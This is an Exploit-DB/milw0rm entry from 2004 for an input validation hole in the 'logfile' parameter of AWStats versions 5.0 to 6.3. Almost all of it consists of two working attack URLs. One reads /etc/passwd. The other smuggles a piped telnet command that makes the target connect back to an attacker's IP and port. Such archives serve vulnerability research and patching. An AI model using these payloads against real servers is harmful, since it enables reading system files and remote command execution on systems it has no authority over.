AWStats (5.0-6.3) Input Validation Hole in 'logfile'

EDB-ID: 407 CVE: N/A OSVDB-ID: 9109
Verified: Author: Johnathan Bat Published: 2004-08-21
Download Exploit: Source Raw Download Vulnerable App: N/A
Example:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>


# milw0rm.com [2004-08-21]